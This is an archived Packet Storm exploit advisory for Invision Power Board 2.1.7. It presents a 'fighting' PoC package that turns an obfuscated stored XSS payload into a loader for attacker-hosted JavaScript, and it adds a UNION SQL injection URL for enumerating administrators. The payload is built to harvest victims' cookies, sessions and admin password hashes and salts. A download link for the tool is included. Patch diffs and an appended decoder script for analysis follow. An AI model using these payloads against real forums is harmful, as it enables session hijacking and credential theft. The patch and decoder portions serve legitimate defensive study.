
ipb217-xsssql.txt

🗓️ 06 Jan 2008 00:00:00 · Reported by Eugene Minaev · Type: packetstorm
🔗 packetstormsecurity.com

INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION, including vulnerability analysis, exploitation, and patch detail

Code
`----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]  
  
INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION  
Eugene Minaev [email protected]  
[ ASCII-art banner: ITDEFENCE.ru Security advisory, 2007 ]
  
----[ NITRO ... ]  
  
This vulnerability had already been found before, but no public "fighting" exploit was
available for it. This PoC consists of several parts: an active XSS generator, a JS file
that is loaded when a victim visits the page containing the XSS, a log viewer, and a
special component that pulls the required data out of the forum's MySQL tables if the
intercepted session belongs to a user with moderator privileges.
  
----[ ANALYSIS ... ]  
  
XSS.php is the most important part of the IPB 2.1.7 PoC package, as it generates the XSS
payload for later injection into the forum board. It must be given the full URL of the
ya.js file (in which you have already changed the path to your own server) as the reference;
after that it is usually enough to press the button. The generated payload nests a [snapback]
tag inside the [img] URL; the JavaScript is assembled with String.fromCharCode() and a
regex-literal .source trick, so the tag names and script URL appear without quotes or extra
slashes and the [img] URL contains none of the characters ?, & or ; that the existing check
in regex_check_image() looks for:
  
[img]http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromCharCode(115,99,114,  
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),  
head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)  
style=visibility:hidden =[/snapback].gif[/img]  
  
The SQL injection can be exploited only with a live session of a user who has access
to the moderator panel. The fix is to cast the "starter" parameter to an integer with
intval(). After a successful injection the forum's administrator team can be enumerated:
  
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*  
  
----[ RECORD ... ]  
{  
  
---IP ADDRESS   sniffed IP address of the victim
---REFERER      forum topic on which the XSS fired
---COOKIES      cookies of the XSSed forum member
---USER ID      user id of the XSSed forum member
---ADMIN NAME   admin username
---ADMIN PASS   admin password hash
---ADMIN SALT   admin hash salt
  
}  
  
----[ PATCH ... ]  
  
FILE   
sources/classes/bbcode/class_bbcode_core.php  
FUNCTION  
regex_check_image  
LINE  
924  
REPLACE  
if ( preg_match( "/[?&;]/", $url) )  
ON  
if ( preg_match( "/[?&;\<\[]/", $url) )   
  
  
FILE  
sources/classes/bbcode/class_bbcode_core.php  
FUNCTION  
post_db_parse_bbcode  
LINE  
486  
REPLACE  
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );  
ON  
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );  
  
if ( $row['bbcode_tag'] == 'snapback' )  
{   
$match[2][$i] = intval( $match[2][$i] );  
}   
  
  
  
www.underwater.itdefence.ru/isniff.rar  
  
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]  
`
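The [img]/[snapback] payload in the ANALYSIS section is obfuscated with String.fromCharCode() and a regex-literal .source trick. The JavaScript below is an added example, not part of the advisory or of the isniff package: it decodes that payload so the injected script URL can be read and logged, and it applies the original and the patched character class from regex_check_image() to the [img] URL to show why the original check let the payload through. The sample is the advisory's own payload joined onto one line; the function names and the two check constants are mine.

```javascript
// Constructed sample: the advisory's payload, joined onto a single line.
const PAYLOAD =
  "[img]http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromCharCode(115,99,114," +
  "105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47))," +
  "head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script) " +
  "style=visibility:hidden =[/snapback].gif[/img]";

// Step 1: replace every String.fromCharCode(n,n,...) call with the string it
// evaluates to, emitted as a double-quoted literal.
function decodeFromCharCode(src) {
  return src.replace(/String\.fromCharCode\(\s*([\d\s,]+?)\s*\)/g, (_m, codes) => {
    const text = codes.split(",").map((c) => String.fromCharCode(Number(c.trim()))).join("");
    return JSON.stringify(text);
  });
}

// Step 2: resolve the  /text/.source.replace(/x/g,"/")  trick.  A regex
// literal's .source is just the text between the slashes, so the attacker
// writes the URL with a placeholder character and swaps it for "/" at runtime.
function decodeRegexSource(src) {
  return src.replace(
    /\/([^\/\n]+)\/\.source\.replace\(\/(.)\/g,\s*"([^"]*)"\)/g,
    (_m, body, placeholder, replacement) => JSON.stringify(body.split(placeholder).join(replacement))
  );
}

function decodePayload(payload) {
  return decodeRegexSource(decodeFromCharCode(payload));
}

// Step 3: list the script sources assigned in the decoded payload
// (what an analyst wants in the log: where the second stage is fetched from).
function extractScriptSources(decoded) {
  const out = [];
  const re = /\.src\s*=\s*"([^"]+)"/g;
  let m;
  while ((m = re.exec(decoded)) !== null) out.push(m[1]);
  return out;
}

// Step 4: the character classes from the advisory's PATCH section, as
// JavaScript regexes.  ORIGINAL_CHECK is the pre-patch test in
// regex_check_image(); PATCHED_CHECK additionally rejects '<' and '['.
const ORIGINAL_CHECK = /[?&;]/;
const PATCHED_CHECK = /[?&;<\[]/;

// The text between [img] and [/img], i.e. what regex_check_image() sees as $url.
function imgUrlOf(payload) {
  const m = /\[img\]([\s\S]*?)\[\/img\]/i.exec(payload);
  return m ? m[1] : null;
}

// true when the given check would refuse the [img] URL of this payload.
function rejectedBy(check, payload) {
  const url = imgUrlOf(payload);
  return url !== null && check.test(url);
}

console.log(decodePayload(PAYLOAD));
console.log("script sources:", extractScriptSources(decodePayload(PAYLOAD)));
console.log("rejected by original check:", rejectedBy(ORIGINAL_CHECK, PAYLOAD));
console.log("rejected by patched check:", rejectedBy(PATCHED_CHECK, PAYLOAD));
```

Run with `node`; the decoded line shows `document.createElement("script")`, `script.src="http://daim.ru/monzter/forum"` and `getElementsByTagName("head")` in clear text, the original check reports false (no `?`, `&` or `;` anywhere in the [img] URL) and the patched check reports true because of the `[` that opens the nested [snapback] tag.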
